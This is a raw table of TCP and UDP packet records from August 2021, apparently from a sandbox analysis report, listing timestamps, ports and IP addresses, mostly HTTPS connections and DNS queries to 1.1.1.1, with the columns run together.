                                                                                                                                                                Aug 16, 2021 19:10:36.617558956 CEST44354477172.217.168.78192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:36.617603064 CEST44354477172.217.168.78192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:36.617635965 CEST44354477172.217.168.78192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:36.617669106 CEST44354477172.217.168.78192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:36.617700100 CEST44354477172.217.168.78192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:36.617722034 CEST54477443192.168.2.3172.217.168.78
                                                                                                                                                                Aug 16, 2021 19:10:36.617772102 CEST54477443192.168.2.3172.217.168.78
                                                                                                                                                                Aug 16, 2021 19:10:36.639348030 CEST54477443192.168.2.3172.217.168.78
                                                                                                                                                                Aug 16, 2021 19:10:36.639611006 CEST54477443192.168.2.3172.217.168.78
                                                                                                                                                                Aug 16, 2021 19:10:36.639821053 CEST54477443192.168.2.3172.217.168.78
                                                                                                                                                                Aug 16, 2021 19:10:36.639837980 CEST54477443192.168.2.3172.217.168.78
                                                                                                                                                                Aug 16, 2021 19:10:36.659606934 CEST44354477172.217.168.78192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:36.659648895 CEST44354477172.217.168.78192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:36.659822941 CEST44354477172.217.168.78192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:36.659890890 CEST54477443192.168.2.3172.217.168.78
                                                                                                                                                                Aug 16, 2021 19:10:36.660185099 CEST54477443192.168.2.3172.217.168.78
                                                                                                                                                                Aug 16, 2021 19:10:36.684591055 CEST44354477172.217.168.78192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:36.702867031 CEST44354477172.217.168.78192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:36.702920914 CEST44354477172.217.168.78192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:36.702931881 CEST44354477172.217.168.78192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:36.702939987 CEST44354477172.217.168.78192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:36.703083038 CEST54477443192.168.2.3172.217.168.78
                                                                                                                                                                Aug 16, 2021 19:10:36.705254078 CEST54477443192.168.2.3172.217.168.78
                                                                                                                                                                Aug 16, 2021 19:10:36.729662895 CEST44354477172.217.168.78192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:47.053378105 CEST49750443192.168.2.313.107.21.200
                                                                                                                                                                Aug 16, 2021 19:10:47.054476976 CEST49750443192.168.2.313.107.21.200
                                                                                                                                                                Aug 16, 2021 19:10:47.054613113 CEST49750443192.168.2.313.107.21.200
                                                                                                                                                                Aug 16, 2021 19:10:47.054732084 CEST49750443192.168.2.313.107.21.200
                                                                                                                                                                Aug 16, 2021 19:10:47.054789066 CEST49750443192.168.2.313.107.21.200
                                                                                                                                                                Aug 16, 2021 19:10:47.054814100 CEST49750443192.168.2.313.107.21.200
                                                                                                                                                                Aug 16, 2021 19:10:47.054831982 CEST49750443192.168.2.313.107.21.200
                                                                                                                                                                Aug 16, 2021 19:10:47.054999113 CEST49750443192.168.2.313.107.21.200
                                                                                                                                                                Aug 16, 2021 19:10:47.055191994 CEST49750443192.168.2.313.107.21.200
                                                                                                                                                                Aug 16, 2021 19:10:47.074017048 CEST4434975013.107.21.200192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:47.074373007 CEST4434975013.107.21.200192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:47.074769020 CEST4434975013.107.21.200192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:47.075203896 CEST4434975013.107.21.200192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:47.075232029 CEST4434975013.107.21.200192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:47.075278997 CEST4434975013.107.21.200192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:47.075340986 CEST4434975013.107.21.200192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:47.075368881 CEST4434975013.107.21.200192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:47.075742960 CEST4434975013.107.21.200192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:47.075804949 CEST4434975013.107.21.200192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:47.075903893 CEST4434975013.107.21.200192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:47.075964928 CEST4434975013.107.21.200192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:47.075999975 CEST4434975013.107.21.200192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:47.076339006 CEST4434975013.107.21.200192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:47.076464891 CEST4434975013.107.21.200192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:47.076658010 CEST4434975013.107.21.200192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:47.076759100 CEST4434975013.107.21.200192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:47.076786041 CEST4434975013.107.21.200192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:47.076831102 CEST4434975013.107.21.200192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:47.076934099 CEST4434975013.107.21.200192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:47.077028990 CEST4434975013.107.21.200192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:47.077058077 CEST4434975013.107.21.200192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:47.077276945 CEST4434975013.107.21.200192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:47.077305079 CEST4434975013.107.21.200192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:47.077367067 CEST4434975013.107.21.200192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:47.077403069 CEST4434975013.107.21.200192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:47.077549934 CEST4434975013.107.21.200192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:47.077600956 CEST4434975013.107.21.200192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:47.077610970 CEST4434975013.107.21.200192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:47.077647924 CEST4434975013.107.21.200192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:47.077784061 CEST49750443192.168.2.313.107.21.200
                                                                                                                                                                Aug 16, 2021 19:10:47.077872992 CEST4434975013.107.21.200192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:47.077903986 CEST4434975013.107.21.200192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:47.077928066 CEST4434975013.107.21.200192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:47.077953100 CEST4434975013.107.21.200192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:47.077990055 CEST49750443192.168.2.313.107.21.200
                                                                                                                                                                Aug 16, 2021 19:10:47.078068972 CEST4434975013.107.21.200192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:47.078227997 CEST4434975013.107.21.200192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:47.078288078 CEST4434975013.107.21.200192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:47.078301907 CEST4434975013.107.21.200192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:47.078520060 CEST4434975013.107.21.200192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:47.078564882 CEST4434975013.107.21.200192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:47.078663111 CEST4434975013.107.21.200192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:47.159173965 CEST4434975013.107.21.200192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:47.159334898 CEST49750443192.168.2.313.107.21.200
                                                                                                                                                                Aug 16, 2021 19:10:52.458308935 CEST49750443192.168.2.313.107.21.200
                                                                                                                                                                Aug 16, 2021 19:10:52.460656881 CEST49750443192.168.2.313.107.21.200
                                                                                                                                                                Aug 16, 2021 19:10:52.460741043 CEST49750443192.168.2.313.107.21.200
                                                                                                                                                                Aug 16, 2021 19:10:52.460764885 CEST49750443192.168.2.313.107.21.200
                                                                                                                                                                Aug 16, 2021 19:10:52.478965044 CEST4434975013.107.21.200192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:52.479012012 CEST4434975013.107.21.200192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:52.481069088 CEST4434975013.107.21.200192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:52.481172085 CEST4434975013.107.21.200192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:52.481254101 CEST4434975013.107.21.200192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:52.481353998 CEST4434975013.107.21.200192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:52.481383085 CEST4434975013.107.21.200192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:52.481559038 CEST4434975013.107.21.200192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:52.481607914 CEST4434975013.107.21.200192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:52.481633902 CEST4434975013.107.21.200192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:52.481657982 CEST4434975013.107.21.200192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:52.481787920 CEST4434975013.107.21.200192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:52.481842041 CEST4434975013.107.21.200192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:52.482059956 CEST4434975013.107.21.200192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:52.514324903 CEST4434975013.107.21.200192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:52.514411926 CEST49750443192.168.2.313.107.21.200
                                                                                                                                                                Aug 16, 2021 19:10:59.095484972 CEST54477443192.168.2.3172.217.168.78
                                                                                                                                                                Aug 16, 2021 19:10:59.095535994 CEST54477443192.168.2.3172.217.168.78
                                                                                                                                                                Aug 16, 2021 19:10:59.095542908 CEST54477443192.168.2.3172.217.168.78
                                                                                                                                                                Aug 16, 2021 19:10:59.115667105 CEST44354477172.217.168.78192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:59.115690947 CEST44354477172.217.168.78192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:59.115711927 CEST44354477172.217.168.78192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:59.115731001 CEST44354477172.217.168.78192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:59.156966925 CEST54477443192.168.2.3172.217.168.78
                                                                                                                                                                Aug 16, 2021 19:10:59.160096884 CEST44354477172.217.168.78192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:59.160162926 CEST44354477172.217.168.78192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:59.160195112 CEST44354477172.217.168.78192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:59.160218000 CEST44354477172.217.168.78192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:59.160254955 CEST54477443192.168.2.3172.217.168.78
                                                                                                                                                                Aug 16, 2021 19:10:59.160300970 CEST54477443192.168.2.3172.217.168.78
                                                                                                                                                                Aug 16, 2021 19:10:59.162698984 CEST54477443192.168.2.3172.217.168.78
                                                                                                                                                                Aug 16, 2021 19:10:59.186548948 CEST44354477172.217.168.78192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:12.058132887 CEST4972080192.168.2.38.248.117.254
                                                                                                                                                                Aug 16, 2021 19:11:12.087965012 CEST80497208.248.117.254192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:12.088068962 CEST4972080192.168.2.38.248.117.254
                                                                                                                                                                Aug 16, 2021 19:11:12.121963024 CEST804971993.184.220.29192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:12.122083902 CEST4971980192.168.2.393.184.220.29
                                                                                                                                                                Aug 16, 2021 19:11:12.714184999 CEST4973080192.168.2.3104.89.41.209
                                                                                                                                                                Aug 16, 2021 19:11:12.714267969 CEST4973180192.168.2.3104.89.41.209
                                                                                                                                                                Aug 16, 2021 19:11:12.714381933 CEST49729443192.168.2.3104.89.26.236
                                                                                                                                                                Aug 16, 2021 19:11:12.714452028 CEST49734443192.168.2.3104.89.26.236
                                                                                                                                                                Aug 16, 2021 19:11:12.742049932 CEST44349729104.89.26.236192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:12.742060900 CEST44349729104.89.26.236192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:12.742073059 CEST8049731104.89.41.209192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:12.742130041 CEST49729443192.168.2.3104.89.26.236
                                                                                                                                                                Aug 16, 2021 19:11:12.742208004 CEST49729443192.168.2.3104.89.26.236
                                                                                                                                                                Aug 16, 2021 19:11:12.742235899 CEST4973180192.168.2.3104.89.41.209
                                                                                                                                                                Aug 16, 2021 19:11:12.743906021 CEST8049730104.89.41.209192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:12.744407892 CEST4973080192.168.2.3104.89.41.209
                                                                                                                                                                Aug 16, 2021 19:11:12.745642900 CEST44349734104.89.26.236192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:12.745676994 CEST44349734104.89.26.236192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:12.745723009 CEST49734443192.168.2.3104.89.26.236
                                                                                                                                                                Aug 16, 2021 19:11:12.745790005 CEST49734443192.168.2.3104.89.26.236
                                                                                                                                                                Aug 16, 2021 19:11:13.054512024 CEST804971893.184.220.29192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:13.054609060 CEST4971880192.168.2.393.184.220.29
                                                                                                                                                                Aug 16, 2021 19:11:14.123467922 CEST804973593.184.220.29192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:14.125287056 CEST4973580192.168.2.393.184.220.29
                                                                                                                                                                Aug 16, 2021 19:11:14.230670929 CEST804974893.184.220.29192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:14.230793953 CEST4974880192.168.2.393.184.220.29
                                                                                                                                                                Aug 16, 2021 19:11:14.344544888 CEST49749443192.168.2.313.107.21.200
                                                                                                                                                                Aug 16, 2021 19:11:14.834599972 CEST49747443192.168.2.3204.79.197.200
                                                                                                                                                                Aug 16, 2021 19:11:14.834882975 CEST4974880192.168.2.393.184.220.29
                                                                                                                                                                Aug 16, 2021 19:11:16.803914070 CEST4434973752.113.195.132192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:18.084757090 CEST4434973652.113.195.132192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:19.264564991 CEST4434971352.113.195.132192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:19.795680046 CEST64780443192.168.2.3172.217.168.13
                                                                                                                                                                Aug 16, 2021 19:11:19.800744057 CEST65369443192.168.2.3172.217.168.46
                                                                                                                                                                Aug 16, 2021 19:11:19.816472054 CEST44364780172.217.168.13192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:19.821006060 CEST44365369172.217.168.46192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:20.895822048 CEST53772443192.168.2.3172.217.168.65
                                                                                                                                                                Aug 16, 2021 19:11:20.915985107 CEST44353772172.217.168.65192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:38.276304960 CEST49722443192.168.2.352.109.88.177
                                                                                                                                                                Aug 16, 2021 19:11:38.277041912 CEST49738443192.168.2.352.109.76.40
                                                                                                                                                                Aug 16, 2021 19:11:44.192277908 CEST54477443192.168.2.3172.217.168.78
                                                                                                                                                                Aug 16, 2021 19:11:44.212544918 CEST44354477172.217.168.78192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:12:01.640845060 CEST4971980192.168.2.393.184.220.29
                                                                                                                                                                Aug 16, 2021 19:12:01.641148090 CEST4971880192.168.2.393.184.220.29
                                                                                                                                                                Aug 16, 2021 19:12:01.641299963 CEST4971580192.168.2.38.248.115.254
                                                                                                                                                                Aug 16, 2021 19:12:01.641500950 CEST4971780192.168.2.38.248.117.254
                                                                                                                                                                Aug 16, 2021 19:12:01.664830923 CEST804971993.184.220.29192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:12:01.664999962 CEST4971980192.168.2.393.184.220.29
                                                                                                                                                                Aug 16, 2021 19:12:01.665611029 CEST804971893.184.220.29192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:12:01.665808916 CEST4971880192.168.2.393.184.220.29
                                                                                                                                                                Aug 16, 2021 19:12:01.670324087 CEST80497178.248.117.254192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:12:01.670522928 CEST4971780192.168.2.38.248.117.254
                                                                                                                                                                Aug 16, 2021 19:12:01.672194958 CEST80497158.248.115.254192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:12:01.674455881 CEST4971580192.168.2.38.248.115.254
                                                                                                                                                                Aug 16, 2021 19:12:02.375216007 CEST4973580192.168.2.393.184.220.29
                                                                                                                                                                Aug 16, 2021 19:12:02.375408888 CEST4973280192.168.2.38.248.115.254
                                                                                                                                                                Aug 16, 2021 19:12:02.375788927 CEST4973380192.168.2.38.248.115.254
                                                                                                                                                                Aug 16, 2021 19:12:02.399631977 CEST804973593.184.220.29192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:12:02.399959087 CEST4973580192.168.2.393.184.220.29
                                                                                                                                                                Aug 16, 2021 19:12:02.404791117 CEST80497328.248.115.254192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:12:02.404926062 CEST4973280192.168.2.38.248.115.254
                                                                                                                                                                Aug 16, 2021 19:12:02.406912088 CEST80497338.248.115.254192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:12:02.407449007 CEST4973380192.168.2.38.248.115.254
                                                                                                                                                                Aug 16, 2021 19:12:04.821017027 CEST64780443192.168.2.3172.217.168.13
                                                                                                                                                                Aug 16, 2021 19:12:04.826009035 CEST65369443192.168.2.3172.217.168.46
                                                                                                                                                                Aug 16, 2021 19:12:04.841835022 CEST44364780172.217.168.13192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:12:04.845922947 CEST44365369172.217.168.46192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:12:05.921067953 CEST53772443192.168.2.3172.217.168.65
                                                                                                                                                                Aug 16, 2021 19:12:05.941032887 CEST44353772172.217.168.65192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:12:07.670227051 CEST6539880192.168.2.3185.244.41.28
                                                                                                                                                                Aug 16, 2021 19:12:07.738559961 CEST8065398185.244.41.28192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:12:07.738782883 CEST6539880192.168.2.3185.244.41.28
                                                                                                                                                                Aug 16, 2021 19:12:07.740905046 CEST6539880192.168.2.3185.244.41.28
                                                                                                                                                                Aug 16, 2021 19:12:07.809124947 CEST8065398185.244.41.28192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:12:08.822601080 CEST8065398185.244.41.28192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:12:08.822654009 CEST8065398185.244.41.28192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:12:08.822830915 CEST6539880192.168.2.3185.244.41.28
                                                                                                                                                                Aug 16, 2021 19:12:08.829593897 CEST6539880192.168.2.3185.244.41.28
                                                                                                                                                                Aug 16, 2021 19:12:08.897861958 CEST8065398185.244.41.28192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:12:29.221142054 CEST54477443192.168.2.3172.217.168.78
                                                                                                                                                                Aug 16, 2021 19:12:29.241262913 CEST44354477172.217.168.78192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:12:49.846836090 CEST64780443192.168.2.3172.217.168.13
                                                                                                                                                                Aug 16, 2021 19:12:49.850218058 CEST65369443192.168.2.3172.217.168.46
                                                                                                                                                                Aug 16, 2021 19:12:49.871890068 CEST44364780172.217.168.13192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:12:50.947207928 CEST53772443192.168.2.3172.217.168.65
                                                                                                                                                                Aug 16, 2021 19:12:50.971342087 CEST44353772172.217.168.65192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:12:53.733292103 CEST4434975013.107.21.200192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:13:14.313951969 CEST54477443192.168.2.3172.217.168.78
                                                                                                                                                                Aug 16, 2021 19:13:14.333998919 CEST44354477172.217.168.78192.168.2.3

                                                                                                                                                                UDP Packets

                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                Aug 16, 2021 19:10:18.734625101 CEST5987353192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:10:18.761244059 CEST5905953192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:10:18.799119949 CEST53598731.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:18.825979948 CEST53590591.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:19.168190956 CEST6197353192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:10:19.175411940 CEST6508153192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:10:19.194068909 CEST53619731.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:19.364707947 CEST53650811.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:19.801208019 CEST5921553192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:10:19.870716095 CEST53592151.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:21.844800949 CEST6252853192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:10:21.865959883 CEST53625281.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:24.652461052 CEST6229053192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:10:24.673111916 CEST53622901.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:24.932290077 CEST5066553192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:10:24.953073025 CEST53506651.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:25.258157015 CEST5123953192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:10:25.279184103 CEST53512391.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:25.559057951 CEST5878453192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:10:25.580719948 CEST53587841.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:34.451327085 CEST5965453192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:10:34.452843904 CEST6283753192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:10:34.453860998 CEST6192053192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:10:34.454099894 CEST6119753192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:10:34.458116055 CEST5200453192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:10:34.471942902 CEST53596541.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:34.473799944 CEST53628371.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:34.478817940 CEST53520041.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:34.552921057 CEST53619201.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:34.726068020 CEST53611971.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:34.847726107 CEST5931153192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:10:34.868072987 CEST53593111.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:35.081835985 CEST6424653192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:10:35.086837053 CEST4970253192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:10:35.103252888 CEST53642461.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:35.107531071 CEST53497021.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:35.521699905 CEST6344753192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:10:35.542895079 CEST53634471.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:36.543579102 CEST6272153192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:10:36.564141035 CEST53627211.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:42.435148954 CEST6264353192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:10:42.456126928 CEST53626431.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:59.095175028 CEST50134443192.168.2.3172.217.168.78
                                                                                                                                                                Aug 16, 2021 19:10:59.116264105 CEST44350134172.217.168.78192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:59.118098021 CEST50134443192.168.2.3172.217.168.78
                                                                                                                                                                Aug 16, 2021 19:10:59.129044056 CEST44350134172.217.168.78192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:59.129113913 CEST44350134172.217.168.78192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:59.129167080 CEST44350134172.217.168.78192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:59.129220963 CEST44350134172.217.168.78192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:59.129759073 CEST50134443192.168.2.3172.217.168.78
                                                                                                                                                                Aug 16, 2021 19:10:59.130050898 CEST50134443192.168.2.3172.217.168.78
                                                                                                                                                                Aug 16, 2021 19:10:59.138849020 CEST44350134172.217.168.78192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:59.138868093 CEST44350134172.217.168.78192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:59.140398026 CEST50134443192.168.2.3172.217.168.78
                                                                                                                                                                Aug 16, 2021 19:10:59.161247015 CEST44350134172.217.168.78192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:59.161277056 CEST44350134172.217.168.78192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:59.162314892 CEST50134443192.168.2.3172.217.168.78
                                                                                                                                                                Aug 16, 2021 19:10:59.186570883 CEST44350134172.217.168.78192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:59.188534021 CEST50134443192.168.2.3172.217.168.78
                                                                                                                                                                Aug 16, 2021 19:11:12.784378052 CEST5691453192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:11:12.804691076 CEST53569141.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:12.899964094 CEST5000653192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:11:12.920742989 CEST53500061.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:14.023876905 CEST6553253192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:11:14.163172960 CEST53655321.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:15.921431065 CEST5028553192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:11:15.942163944 CEST53502851.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:16.388461113 CEST6015253192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:11:16.408986092 CEST53601521.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:16.764219046 CEST4984553192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:11:16.785020113 CEST53498451.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:17.526992083 CEST6467253192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:11:17.548098087 CEST53646721.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:17.721081972 CEST5601653192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:11:17.742396116 CEST53560161.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:17.935945988 CEST6104453192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:11:17.956625938 CEST53610441.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:18.652035952 CEST6127153192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:11:18.672480106 CEST53612711.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:19.159934044 CEST5776953192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:11:19.180944920 CEST53577691.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:19.596275091 CEST6449253192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:11:19.617351055 CEST53644921.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:20.438371897 CEST5430753192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:11:20.458916903 CEST53543071.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:26.957995892 CEST5561953192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:11:26.978904963 CEST53556191.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:34.411412954 CEST6056653192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:11:34.426924944 CEST5219153192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:11:34.432743073 CEST53605661.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:34.447846889 CEST53521911.1.1.1192.168.2.3
